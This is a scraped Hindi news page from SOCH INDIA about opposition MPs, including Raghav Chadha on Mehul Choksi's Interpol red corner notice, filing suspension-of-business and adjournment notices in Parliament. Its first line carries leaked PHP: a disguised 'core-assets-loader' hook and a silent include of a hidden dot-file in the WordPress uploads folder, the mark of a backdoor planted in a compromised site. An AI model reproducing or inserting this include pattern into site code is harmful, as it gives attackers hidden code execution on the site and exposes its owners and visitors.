add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); AAP सांसद राघव चड्ढा ने संसद में दिया नोटिस, भगोड़े मेहुल चौकसी पर हो चर्चा – SOCH INDIA
Menu

देश
AAP सांसद राघव चड्ढा ने संसद में दिया नोटिस, भगोड़े मेहुल चौकसी पर हो चर्चा

nobanner

आम आदमी पार्टी के सांसद राघव चड्ढा (Raghav Chadha) ने भगोड़े आर्थिक अपराधी मेहुल चौकसी (Mehul Choksi ) के नाम पर इंटरपोल द्वारा जारी रेड कॉर्नर नोटिस को वापस लेने पर चर्चा को लेकर संसद में सस्पेंशन आफ बिजनेस नोटिस दिया है. राघव चड्ढा पंजाब से राज्यसभा के सदस्य हैं. इससे पहले, कांग्रेस के राज्यसभा सांसद प्रमोद तिवारी ने अदाणी समूह के मामले की जांच को लेकर संयुक्त संसदीय समिति (जेपीसी) के गठन न करने को लेकर चर्चा के लिए सस्पेंशन आफ बिजनेस नोटिस दिया. वहीं, कांग्रसे सांसद मनीष तिवारी ने चीन के सीमा विवाद को लेकर बॉर्डर की स्थिति पर चर्चा को लेकर लोकसभा में स्थगन प्रस्ताव का नोटिस दिया.